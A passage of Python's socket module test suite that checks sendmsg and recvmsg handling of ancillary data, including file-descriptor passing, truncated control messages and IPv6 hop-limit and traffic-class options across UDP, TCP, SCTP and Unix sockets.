(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except socket.error as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except socket.error as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
